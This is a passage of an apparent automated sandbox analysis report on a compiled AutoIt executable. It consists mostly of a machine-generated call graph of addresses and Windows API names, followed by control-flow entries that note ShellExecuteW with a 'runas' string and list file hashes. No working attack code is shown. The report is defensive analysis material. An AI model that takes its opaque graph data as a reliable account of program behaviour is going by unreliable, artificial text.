95061->95066 95063 7ff7bb7e82f2 Concurrency::wait 95064 7ff7bb7e8314 CloseHandle 95063->95064 95065 7ff7bb7e8303 95064->95065 95067 7ff7bb7e833d CloseHandle 95066->95067 95068 7ff7bb7e832a 95066->95068 95067->95068 95068->95063 95070 7ff7bb85b3c8 95069->95070 95071 7ff7bb85b42a 95069->95071 95072 7ff7bb85b41e 95070->95072 95073 7ff7bb85b3d0 95070->95073 95074 7ff7bb85b334 4 API calls 95071->95074 95136 7ff7bb85b458 8 API calls 95072->95136 95076 7ff7bb85b3dd 95073->95076 95077 7ff7bb85b3f1 95073->95077 95086 7ff7bb85b410 Concurrency::wait 95074->95086 95132 7ff7bb7ea368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95076->95132 95134 7ff7bb7ea368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95077->95134 95080 7ff7bb85b3f6 95135 7ff7bb85b270 6 API calls 95080->95135 95081 7ff7bb85b3e2 95133 7ff7bb804120 6 API calls 95081->95133 95084 7ff7bb85b3ef 95129 7ff7bb85b384 95084->95129 95086->94943 95088 7ff7bb804c68 4 API calls 95087->95088 95089 7ff7bb7e8363 95088->95089 95090 7ff7bb7e8314 CloseHandle 95089->95090 95091 7ff7bb7e836f 95090->95091 95137 7ff7bb7e9640 95091->95137 95093 7ff7bb7e8378 95094 7ff7bb7e8314 CloseHandle 95093->95094 95095 7ff7bb7e8380 95094->95095 95095->94915 95097 7ff7bb7e8314 CloseHandle 95096->95097 95098 7ff7bb7e685a 95097->95098 95099 7ff7bb82caa8 95098->95099 95100 7ff7bb7e687d CreateFileW 95098->95100 95101 7ff7bb82caae CreateFileW 95099->95101 95109 7ff7bb7e68d9 95099->95109 95103 7ff7bb7e68ab 95100->95103 95102 7ff7bb82cae6 95101->95102 95101->95103 95142 7ff7bb7e6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95102->95142 95104 7ff7bb7e68e4 95103->95104 95140 7ff7bb7e68f4 9 API calls 95103->95140 95104->94918 95104->94925 95106 7ff7bb82caf3 95106->95103 95108 7ff7bb7e68c1 95108->95109 95141 7ff7bb7e6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95108->95141 95109->95104 95111 7ff7bb85b334 4 API calls 95109->95111 95111->95104 95113 7ff7bb804c68 4 API calls 
95112->95113 95114 7ff7bb7e9918 95113->95114 95114->94934 95116 7ff7bb7e721c 95115->95116 95117 7ff7bb82cd0c 95115->95117 95118 7ff7bb7e7274 95116->95118 95121 7ff7bb82cd66 memcpy_s 95116->95121 95122 7ff7bb804c68 4 API calls 95117->95122 95119 7ff7bb7eb960 4 API calls 95118->95119 95120 7ff7bb7e7283 memcpy_s 95119->95120 95120->94941 95123 7ff7bb804c68 4 API calls 95121->95123 95122->95121 95124 7ff7bb82cdda memcpy_s 95123->95124 95125->94922 95143 7ff7bb85b188 95126->95143 95130 7ff7bb85b334 4 API calls 95129->95130 95131 7ff7bb85b399 95130->95131 95131->95086 95132->95081 95133->95084 95134->95080 95135->95084 95136->95086 95138 7ff7bb804c68 4 API calls 95137->95138 95139 7ff7bb7e9663 95138->95139 95139->95093 95140->95108 95141->95109 95142->95106 95144 7ff7bb85b19c WriteFile 95143->95144 95145 7ff7bb85b193 95143->95145 95144->94943 95147 7ff7bb85b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95145->95147 95147->95144 95148->94955 95149->94993 95150->94997 95151->95003 95152->95010 95153->95005 95157 7ff7bb87f671 __scrt_fastfail 95154->95157 95155 7ff7bb7ed4cc 48 API calls 95156 7ff7bb87f74d 95155->95156 95223 7ff7bb7ee330 95156->95223 95157->95155 95159 7ff7bb87f759 95160 7ff7bb87f762 95159->95160 95161 7ff7bb87f840 95159->95161 95163 7ff7bb7ed4cc 48 API calls 95160->95163 95162 7ff7bb87f87d GetCurrentDirectoryW 95161->95162 95164 7ff7bb7ed4cc 48 API calls 95161->95164 95165 7ff7bb804c68 4 API calls 95162->95165 95166 7ff7bb87f777 95163->95166 95167 7ff7bb87f85c 95164->95167 95168 7ff7bb87f8a7 GetCurrentDirectoryW 95165->95168 95169 7ff7bb7ee330 4 API calls 95166->95169 95170 7ff7bb7ee330 4 API calls 95167->95170 95171 7ff7bb87f8b5 95168->95171 95172 7ff7bb87f783 95169->95172 95173 7ff7bb87f868 95170->95173 95174 7ff7bb87f8f0 95171->95174 95236 7ff7bb7ff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95171->95236 95175 7ff7bb7ed4cc 48 API calls 95172->95175 95173->95162 95173->95174 95182 7ff7bb87f905 95174->95182 95185 
7ff7bb87f901 95174->95185 95177 7ff7bb87f798 95175->95177 95179 7ff7bb7ee330 4 API calls 95177->95179 95178 7ff7bb87f8d0 95237 7ff7bb7ff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95178->95237 95181 7ff7bb87f7a4 95179->95181 95184 7ff7bb7ed4cc 48 API calls 95181->95184 95239 7ff7bb85fddc 8 API calls 95182->95239 95183 7ff7bb87f8e0 95238 7ff7bb7ff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95183->95238 95190 7ff7bb87f7b9 95184->95190 95187 7ff7bb87f972 95185->95187 95188 7ff7bb87fa0f CreateProcessW 95185->95188 95242 7ff7bb84d1f8 99 API calls 95187->95242 95219 7ff7bb87f9b4 95188->95219 95193 7ff7bb7ee330 4 API calls 95190->95193 95191 7ff7bb87f90e 95240 7ff7bb85fca8 8 API calls 95191->95240 95195 7ff7bb87f7c5 95193->95195 95197 7ff7bb87f806 GetSystemDirectoryW 95195->95197 95199 7ff7bb7ed4cc 48 API calls 95195->95199 95196 7ff7bb87f926 95241 7ff7bb85fafc 8 API calls ~SyncLockT 95196->95241 95201 7ff7bb804c68 4 API calls 95197->95201 95203 7ff7bb87f7e1 95199->95203 95200 7ff7bb87f94f 95200->95185 95202 7ff7bb87f830 GetSystemDirectoryW 95201->95202 95202->95171 95205 7ff7bb7ee330 4 API calls 95203->95205 95204 7ff7bb87fabe CloseHandle 95206 7ff7bb87facc 95204->95206 95207 7ff7bb87faf5 95204->95207 95208 7ff7bb87f7ed 95205->95208 95243 7ff7bb85f7dc 95206->95243 95210 7ff7bb87fafe 95207->95210 95214 7ff7bb87fb26 CloseHandle 95207->95214 95208->95171 95208->95197 95218 7ff7bb87faa3 95210->95218 95212 7ff7bb87fa64 95215 7ff7bb87fa84 GetLastError 95212->95215 95214->95218 95215->95218 95227 7ff7bb85f51c 95218->95227 95219->95204 95219->95212 95222->95013 95224 7ff7bb7ee342 95223->95224 95225 7ff7bb804c68 4 API calls 95224->95225 95226 7ff7bb7ee361 wcscpy 95225->95226 95226->95159 95228 7ff7bb85f7dc CloseHandle 95227->95228 95229 7ff7bb85f52a 95228->95229 95248 7ff7bb85f7b8 95229->95248 95232 7ff7bb85f7b8 ~SyncLockT CloseHandle 95233 7ff7bb85f53c 95232->95233 95234 7ff7bb85f7b8 ~SyncLockT CloseHandle 
95233->95234 95235 7ff7bb85f545 95234->95235 95235->95014 95236->95178 95237->95183 95238->95174 95239->95191 95240->95196 95241->95200 95242->95219 95244 7ff7bb85f7b8 ~SyncLockT CloseHandle 95243->95244 95245 7ff7bb85f7ee 95244->95245 95246 7ff7bb85f7b8 ~SyncLockT CloseHandle 95245->95246 95247 7ff7bb85f7f7 95246->95247 95249 7ff7bb85f7c9 CloseHandle 95248->95249 95250 7ff7bb85f533 95248->95250 95249->95250 95250->95232 95251->95028 95252->95028 95253->95023 95254 7ff7bb81c51c 95255 7ff7bb81c567 95254->95255 95256 7ff7bb81c52b abort 95254->95256 95262 7ff7bb8155d4 15 API calls abort 95255->95262 95256->95255 95258 7ff7bb81c54e HeapAlloc 95256->95258 95261 7ff7bb80925c EnterCriticalSection LeaveCriticalSection abort 95256->95261 95258->95256 95259 7ff7bb81c565 95258->95259 95261->95256 95262->95259 95263 7ff7bb808fac 95264 7ff7bb80901c 95263->95264 95265 7ff7bb808fd2 GetModuleHandleW 95263->95265 95280 7ff7bb81b9bc EnterCriticalSection 95264->95280 95265->95264 95269 7ff7bb808fdf 95265->95269 95267 7ff7bb81ba10 _isindst LeaveCriticalSection 95268 7ff7bb8090f0 95267->95268 95271 7ff7bb8090fc 95268->95271 95272 7ff7bb809118 11 API calls 95268->95272 95269->95264 95281 7ff7bb809164 GetModuleHandleExW 95269->95281 95270 7ff7bb8090b8 95276 7ff7bb81ada4 108 API calls 95270->95276 95272->95271 95273 7ff7bb81aa8c 30 API calls 95278 7ff7bb8090a0 95273->95278 95275 7ff7bb81ada4 108 API calls 95275->95270 95279 7ff7bb8090cb 95276->95279 95277 7ff7bb809026 95277->95273 95277->95278 95277->95279 95278->95270 95278->95275 95279->95267 95282 7ff7bb80918e GetProcAddress 95281->95282 95283 7ff7bb8091b5 95281->95283 95282->95283 95286 7ff7bb8091a8 95282->95286 95284 7ff7bb8091bf FreeLibrary 95283->95284 95285 7ff7bb8091c5 95283->95285 95284->95285 95285->95264 95286->95283 95287 7ff7bb7e5dec 95288 7ff7bb7e5df4 95287->95288 95289 7ff7bb7e5e98 95288->95289 95290 7ff7bb7e5e28 95288->95290 95316 7ff7bb7e5e96 95288->95316 95294 7ff7bb82c229 95289->95294 95295 7ff7bb7e5e9e 95289->95295 
95291 7ff7bb7e5e35 95290->95291 95292 7ff7bb7e5f21 PostQuitMessage 95290->95292 95296 7ff7bb7e5e40 95291->95296 95297 7ff7bb82c2af 95291->95297 95299 7ff7bb7e5e7c 95292->95299 95293 7ff7bb7e5e6b DefWindowProcW 95293->95299 95343 7ff7bb7fede4 8 API calls 95294->95343 95300 7ff7bb7e5ea5 95295->95300 95301 7ff7bb7e5ecc SetTimer RegisterWindowMessageW 95295->95301 95302 7ff7bb7e5f2b 95296->95302 95303 7ff7bb7e5e49 95296->95303 95355 7ff7bb85a40c 16 API calls __scrt_fastfail 95297->95355 95307 7ff7bb82c1b8 95300->95307 95308 7ff7bb7e5eae KillTimer 95300->95308 95301->95299 95304 7ff7bb7e5efc CreatePopupMenu 95301->95304 95333 7ff7bb804610 95302->95333 95303->95316 95317 7ff7bb7e5e5f 95303->95317 95318 7ff7bb7e5f0b 95303->95318 95304->95299 95306 7ff7bb82c255 95344 7ff7bb802c44 47 API calls Concurrency::wait 95306->95344 95313 7ff7bb82c1f7 MoveWindow 95307->95313 95314 7ff7bb82c1bd 95307->95314 95329 7ff7bb7e5d88 95308->95329 95310 7ff7bb82c2c3 95310->95293 95310->95299 95313->95299 95319 7ff7bb82c1c2 95314->95319 95320 7ff7bb82c1e4 SetFocus 95314->95320 95316->95293 95317->95293 95326 7ff7bb7e5d88 Shell_NotifyIconW 95317->95326 95341 7ff7bb7e5f3c 26 API calls __scrt_fastfail 95318->95341 95319->95317 95321 7ff7bb82c1cb 95319->95321 95320->95299 95342 7ff7bb7fede4 8 API calls 95321->95342 95325 7ff7bb7e5f1f 95325->95299 95327 7ff7bb82c280 95326->95327 95345 7ff7bb7e6258 95327->95345 95330 7ff7bb7e5de4 95329->95330 95331 7ff7bb7e5d99 __scrt_fastfail 95329->95331 95340 7ff7bb7e7098 DeleteObject DestroyWindow Concurrency::wait 95330->95340 95332 7ff7bb7e5db8 Shell_NotifyIconW 95331->95332 95332->95330 95334 7ff7bb8046db 95333->95334 95335 7ff7bb80461a __scrt_fastfail 95333->95335 95334->95299 95356 7ff7bb7e72c8 95335->95356 95337 7ff7bb8046a2 KillTimer SetTimer 95337->95334 95338 7ff7bb804660 95338->95337 95339 7ff7bb84aaa1 Shell_NotifyIconW 95338->95339 95339->95337 95340->95299 95341->95325 95342->95299 95343->95306 95344->95317 95346 7ff7bb7e6287 __scrt_fastfail 
95345->95346 95400 7ff7bb7e61c4 95346->95400 95350 7ff7bb7e634e Shell_NotifyIconW 95352 7ff7bb7e72c8 6 API calls 95350->95352 95351 7ff7bb82c644 Shell_NotifyIconW 95354 7ff7bb7e6365 95352->95354 95353 7ff7bb7e632d 95353->95350 95353->95351 95354->95316 95355->95310 95357 7ff7bb7e72f4 95356->95357 95358 7ff7bb7e73bc Concurrency::wait 95356->95358 95359 7ff7bb7e98e8 4 API calls 95357->95359 95358->95338 95360 7ff7bb7e7303 95359->95360 95361 7ff7bb7e7310 95360->95361 95362 7ff7bb82cdfc LoadStringW 95360->95362 95378 7ff7bb7e7cf4 95361->95378 95364 7ff7bb82ce1e 95362->95364 95366 7ff7bb7ee0a8 4 API calls 95364->95366 95365 7ff7bb7e7324 95367 7ff7bb7e7336 95365->95367 95368 7ff7bb82ce30 95365->95368 95374 7ff7bb7e734f __scrt_fastfail wcscpy 95366->95374 95367->95364 95369 7ff7bb7e7343 95367->95369 95389 7ff7bb7e7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95368->95389 95388 7ff7bb7e7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95369->95388 95372 7ff7bb82ce3c 95373 7ff7bb7e71f8 4 API calls 95372->95373 95372->95374 95375 7ff7bb82ce63 95373->95375 95376 7ff7bb7e73a3 Shell_NotifyIconW 95374->95376 95377 7ff7bb7e71f8 4 API calls 95375->95377 95376->95358 95377->95374 95379 7ff7bb82d2c8 95378->95379 95380 7ff7bb7e7d0d 95378->95380 95391 7ff7bb7edda4 95379->95391 95383 7ff7bb7e7d24 95380->95383 95386 7ff7bb7e7d51 95380->95386 95382 7ff7bb82d2d3 95390 7ff7bb7e7e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95383->95390 95385 7ff7bb7e7d2f memcpy_s 95385->95365 95386->95382 95387 7ff7bb804c68 4 API calls 95386->95387 95387->95385 95388->95374 95389->95372 95390->95385 95392 7ff7bb7edda9 95391->95392 95394 7ff7bb7eddc7 memcpy_s 95391->95394 95392->95394 95395 7ff7bb7ea7c0 95392->95395 95394->95382 95396 7ff7bb7ea7ed 95395->95396 95399 7ff7bb7ea7dd memcpy_s 95395->95399 95397 7ff7bb82e7da 95396->95397 95398 7ff7bb804c68 4 API calls 95396->95398 
95398->95399 95399->95394 95401 7ff7bb82c5f8 95400->95401 95402 7ff7bb7e61e0 95400->95402 95401->95402 95403 7ff7bb82c602 DestroyIcon 95401->95403 95402->95353 95404 7ff7bb85ad94 39 API calls wcsftime 95402->95404 95403->95402 95404->95353 95405 7ff7bb83b221 95406 7ff7bb83b22a 95405->95406 95413 7ff7bb7f0378 95405->95413 95428 7ff7bb8547bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95406->95428 95408 7ff7bb83b241 95429 7ff7bb854708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95408->95429 95410 7ff7bb83b264 95411 7ff7bb7f3c20 300 API calls 95410->95411 95412 7ff7bb83b292 95411->95412 95419 7ff7bb7f0405 95412->95419 95430 7ff7bb878d98 49 API calls Concurrency::wait 95412->95430 95422 7ff7bb7ef7b8 95413->95422 95416 7ff7bb83b2d9 Concurrency::wait 95416->95413 95431 7ff7bb8547bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95416->95431 95417 7ff7bb7f070a 95419->95417 95421 7ff7bb7ee0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95419->95421 95432 7ff7bb7eee20 5 API calls Concurrency::wait 95419->95432 95421->95419 95427 7ff7bb7ef7d5 95422->95427 95423 7ff7bb7ef7de 95423->95419 95424 7ff7bb7e9640 4 API calls 95424->95427 95425 7ff7bb7ee0a8 4 API calls 95425->95427 95426 7ff7bb7ef7b8 4 API calls 95426->95427 95427->95423 95427->95424 95427->95425 95427->95426 95428->95408 95429->95410 95430->95416 95431->95416 95432->95419 95433 7ff7bb7f447b 95438 7ff7bb7f58d0 95433->95438 95435 7ff7bb7f448a 95468 7ff7bb8634e4 77 API calls 3 library calls 95435->95468 95437 7ff7bb840550 95439 7ff7bb7f58fc 95438->95439 95444 7ff7bb7f5976 95438->95444 95440 7ff7bb7f596d 95439->95440 95441 7ff7bb7f622b 95439->95441 95439->95444 95467 7ff7bb7f5990 95439->95467 95442 7ff7bb7f5a47 95440->95442 95440->95444 95441->95467 95476 7ff7bb7fe65c 36 API calls 95441->95476 95445 7ff7bb7f6355 95442->95445 95464 7ff7bb7f597f 95442->95464 95465 7ff7bb7f5bd6 
95442->95465 95442->95467 95446 7ff7bb7f6449 95444->95446 95447 7ff7bb841ab5 95444->95447 95462 7ff7bb841aca 95444->95462 95444->95464 95449 7ff7bb7f6367 95445->95449 95445->95465 95450 7ff7bb7ed4cc 48 API calls 95446->95450 95447->95462 95447->95464 95469 7ff7bb7eef68 36 API calls 95449->95469 95454 7ff7bb7f6451 95450->95454 95451 7ff7bb841af3 95474 7ff7bb7efd6c 36 API calls 95451->95474 95458 7ff7bb7ed4cc 48 API calls 95454->95458 95456 7ff7bb7f636f 95470 7ff7bb7fe65c 36 API calls 95456->95470 95457 7ff7bb7efd6c 36 API calls 95457->95464 95461 7ff7bb7f645d 95458->95461 95460 7ff7bb7ed4cc 48 API calls 95460->95464 95472 7ff7bb801ad0 CompareStringW 95461->95472 95462->95467 95473 7ff7bb7efd6c 36 API calls 95462->95473 95464->95457 95464->95460 95464->95465 95464->95467 95471 7ff7bb801ad0 CompareStringW 95464->95471 95465->95467 95475 7ff7bb7efd6c 36 API calls 95465->95475 95467->95435 95468->95437 95469->95456 95470->95467 95471->95464 95472->95464 95473->95451 95474->95467 95475->95467 95476->95467 95477 7ff7bb83f890 95486 7ff7bb7ee18c 95477->95486 95479 7ff7bb83f8a9 95483 7ff7bb83f915 Concurrency::wait 95479->95483 95492 7ff7bb802ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95479->95492 95481 7ff7bb83f8f6 95481->95483 95493 7ff7bb861464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95481->95493 95484 7ff7bb8403e1 Concurrency::wait 95483->95484 95494 7ff7bb8634e4 77 API calls 3 library calls 95483->95494 95487 7ff7bb7ee1c2 95486->95487 95488 7ff7bb7ee1a7 95486->95488 95491 7ff7bb7ee1af 95487->95491 95496 7ff7bb7eee20 5 API calls Concurrency::wait 95487->95496 95495 7ff7bb7eee20 5 API calls Concurrency::wait 95488->95495 95491->95479 95492->95481 95494->95484 95495->95491 95496->95491 95497 7ff7bb7f2c17 95500 7ff7bb7f14a0 95497->95500 95499 7ff7bb7f2c2a 95501 7ff7bb7f14d3 95500->95501 95502 7ff7bb83be31 95501->95502 95504 7ff7bb83bdf2 95501->95504 95505 7ff7bb83bdd1 95501->95505 95532 
7ff7bb7f14fa __scrt_fastfail 95501->95532 95548 7ff7bb878f48 300 API calls 3 library calls 95502->95548 95508 7ff7bb83be19 95504->95508 95546 7ff7bb879a88 300 API calls 4 library calls 95504->95546 95507 7ff7bb83bddb 95505->95507 95505->95532 95545 7ff7bb879514 300 API calls 95507->95545 95547 7ff7bb8634e4 77 API calls 3 library calls 95508->95547 95510 7ff7bb7f1884 95536 7ff7bb802130 45 API calls 95510->95536 95516 7ff7bb7f1a30 45 API calls 95516->95532 95517 7ff7bb7f1898 95517->95499 95524 7ff7bb802130 45 API calls 95524->95532 95525 7ff7bb83bfe4 95551 7ff7bb8793a4 77 API calls 95525->95551 95526 7ff7bb7f1799 95534 7ff7bb7f1815 95526->95534 95552 7ff7bb8634e4 77 API calls 3 library calls 95526->95552 95529 7ff7bb7f3c20 300 API calls 95529->95532 95530 7ff7bb7ee0a8 4 API calls 95530->95532 95532->95510 95532->95516 95532->95524 95532->95525 95532->95526 95532->95529 95532->95530 95532->95534 95535 7ff7bb7eef9c 46 API calls 95532->95535 95537 7ff7bb8020d0 45 API calls 95532->95537 95538 7ff7bb7e5af8 300 API calls 95532->95538 95539 7ff7bb805114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95532->95539 95540 7ff7bb8035c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95532->95540 95541 7ff7bb804f0c 34 API calls _onexit 95532->95541 95542 7ff7bb8050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95532->95542 95543 7ff7bb8036c4 77 API calls 95532->95543 95544 7ff7bb8037dc 300 API calls 95532->95544 95549 7ff7bb7eee20 5 API calls Concurrency::wait 95532->95549 95550 7ff7bb84ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95532->95550 95534->95499 95535->95532 95536->95517 95537->95532 95538->95532 95540->95532 95541->95532 95543->95532 95544->95532 95545->95534 95546->95508 95547->95502 95548->95532 95549->95532 95550->95532 95551->95526 95552->95526 95553 7ff7bb805328 95576 7ff7bb804cac 95553->95576 95556 7ff7bb805474 
95609 7ff7bb8057e4 7 API calls __scrt_fastfail 95556->95609 95557 7ff7bb805344 95559 7ff7bb80547e 95557->95559 95561 7ff7bb805362 95557->95561 95610 7ff7bb8057e4 7 API calls __scrt_fastfail 95559->95610 95562 7ff7bb805387 95561->95562 95567 7ff7bb8053a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 95561->95567 95584 7ff7bb81ada4 95561->95584 95563 7ff7bb805489 abort 95565 7ff7bb80540d 95592 7ff7bb805930 95565->95592 95567->95565 95606 7ff7bb809204 35 API calls pair 95567->95606 95568 7ff7bb805412 95595 7ff7bb7e3730 95568->95595 95573 7ff7bb805435 95573->95563 95608 7ff7bb804e90 8 API calls 2 library calls 95573->95608 95575 7ff7bb80544c 95575->95562 95577 7ff7bb804cce __scrt_initialize_crt 95576->95577 95611 7ff7bb8065ec 95577->95611 95580 7ff7bb804cd7 95580->95556 95580->95557 95585 7ff7bb81ade0 95584->95585 95586 7ff7bb81adff 95584->95586 95585->95586 95660 7ff7bb7e1064 95585->95660 95665 7ff7bb7e1048 95585->95665 95670 7ff7bb7e10e8 95585->95670 95675 7ff7bb80def8 95585->95675 95684 7ff7bb7e1080 95585->95684 95586->95567 95904 7ff7bb806240 95592->95904 95596 7ff7bb7e3743 IsThemeActive 95595->95596 95597 7ff7bb7e37a3 95595->95597 95906 7ff7bb8092d0 95596->95906 95607 7ff7bb805974 GetModuleHandleW 95597->95607 95603 7ff7bb7e377d 95918 7ff7bb7e37b0 95603->95918 95605 7ff7bb7e3785 SystemParametersInfoW 95605->95597 95606->95565 95607->95573 95608->95575 95609->95559 95610->95563 95612 7ff7bb8065f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 95611->95612 95624 7ff7bb807290 95612->95624 95615 7ff7bb804cd3 95615->95580 95619 7ff7bb81ac84 95615->95619 95617 7ff7bb80660c 95617->95615 95631 7ff7bb8072d8 DeleteCriticalSection 95617->95631 95621 7ff7bb824340 95619->95621 95620 7ff7bb804ce0 95620->95580 95623 7ff7bb806620 8 API calls 3 library calls 95620->95623 95621->95620 95648 7ff7bb81dd2c 95621->95648 95623->95580 95625 7ff7bb807298 95624->95625 95627 7ff7bb8072c9 95625->95627 95629 7ff7bb8065ff 95625->95629 95632 7ff7bb807614 95625->95632 
95637 7ff7bb8072d8 DeleteCriticalSection 95627->95637 95629->95615 95630 7ff7bb807218 8 API calls 3 library calls 95629->95630 95630->95617 95631->95615 95638 7ff7bb807310 95632->95638 95635 7ff7bb807654 95635->95625 95636 7ff7bb80765f InitializeCriticalSectionAndSpinCount 95636->95635 95637->95629 95639 7ff7bb807371 95638->95639 95646 7ff7bb80736c try_get_function 95638->95646 95639->95635 95639->95636 95640 7ff7bb807454 95640->95639 95643 7ff7bb807462 GetProcAddress 95640->95643 95641 7ff7bb8073a0 LoadLibraryExW 95642 7ff7bb8073c1 GetLastError 95641->95642 95641->95646 95642->95646 95644 7ff7bb807473 95643->95644 95644->95639 95645 7ff7bb807439 FreeLibrary 95645->95646 95646->95639 95646->95640 95646->95641 95646->95645 95647 7ff7bb8073fb LoadLibraryExW 95646->95647 95647->95646 95659 7ff7bb81b9bc EnterCriticalSection 95648->95659 95650 7ff7bb81dd3c 95651 7ff7bb81e258 32 API calls 95650->95651 95652 7ff7bb81dd45 95651->95652 95653 7ff7bb81dd53 95652->95653 95654 7ff7bb81db44 34 API calls 95652->95654 95655 7ff7bb81ba10 _isindst LeaveCriticalSection 95653->95655 95656 7ff7bb81dd4e 95654->95656 95657 7ff7bb81dd5f 95655->95657 95658 7ff7bb81dc30 GetStdHandle GetFileType 95656->95658 95657->95621 95658->95653 95689 7ff7bb7e7ec0 95660->95689 95662 7ff7bb7e106d 95725 7ff7bb804ebc 34 API calls _onexit 95662->95725 95664 7ff7bb804f15 95664->95585 95774 7ff7bb7e7718 95665->95774 95669 7ff7bb804f15 95669->95585 95794 7ff7bb801d80 95670->95794 95674 7ff7bb804f15 95674->95585 95676 7ff7bb80df03 95675->95676 95819 7ff7bb81de20 95676->95819 95840 7ff7bb7e7920 95684->95840 95686 7ff7bb7e109e 95870 7ff7bb804ebc 34 API calls _onexit 95686->95870 95688 7ff7bb804f15 95688->95585 95726 7ff7bb7e82b4 95689->95726 95692 7ff7bb7e82b4 4 API calls 95693 7ff7bb7e7f3a 95692->95693 95694 7ff7bb7e9640 4 API calls 95693->95694 95695 7ff7bb7e7f46 95694->95695 95696 7ff7bb7e7cf4 4 API calls 95695->95696 95697 7ff7bb7e7f59 95696->95697 95733 7ff7bb802d5c 6 API calls 95697->95733 95699 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E37F2
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3807
• GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E388D
  • Part of subcall function 00007FF7BB7E3F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7BB7E38BF,?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3FFD
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3924
• MessageBoxA.USER32 ref: 00007FF7BB82B888
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB82B8E1
• GetForegroundWindow.USER32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB82B968
• ShellExecuteW.SHELL32 ref: 00007FF7BB82B98F
  • Part of subcall function 00007FF7BB7E3B84: GetSysColorBrush.USER32 ref: 00007FF7BB7E3B9E
  • Part of subcall function 00007FF7BB7E3B84: LoadCursorW.USER32 ref: 00007FF7BB7E3BAE
  • Part of subcall function 00007FF7BB7E3B84: LoadIconW.USER32 ref: 00007FF7BB7E3BC3
  • Part of subcall function 00007FF7BB7E3B84: LoadIconW.USER32 ref: 00007FF7BB7E3BDC
  • Part of subcall function 00007FF7BB7E3B84: LoadIconW.USER32 ref: 00007FF7BB7E3BF5
  • Part of subcall function 00007FF7BB7E3B84: LoadImageW.USER32 ref: 00007FF7BB7E3C21
  • Part of subcall function 00007FF7BB7E3B84: RegisterClassExW.USER32 ref: 00007FF7BB7E3C85
  • Part of subcall function 00007FF7BB7E3CBC: CreateWindowExW.USER32 ref: 00007FF7BB7E3D0C
  • Part of subcall function 00007FF7BB7E3CBC: CreateWindowExW.USER32 ref: 00007FF7BB7E3D5F
                                                                                                                      • Part of subcall function 00007FF7BB7E3CBC: ShowWindow.USER32 ref: 00007FF7BB7E3D75
                                                                                                                      • Part of subcall function 00007FF7BB7E6258: Shell_NotifyIconW.SHELL32 ref: 00007FF7BB7E6350
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                    • API String ID: 1593035822-3287110873
                                                                                                                    • Opcode ID: 3952ebee020ff551dd9b970e0e86bf8aed240aa896a8a003d38d5c5607345415
                                                                                                                    • Instruction ID: 29e547f50c1a73c773572df9da12aac677aaaa819b56a8d5d5ec59493dfdfa54
                                                                                                                    • Opcode Fuzzy Hash: 3952ebee020ff551dd9b970e0e86bf8aed240aa896a8a003d38d5c5607345415
                                                                                                                    • Instruction Fuzzy Hash: 3B71292191C68799EA20BB6CE8505B8A365BF67348FC0013BEE4D061BDDF7CE519C360

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
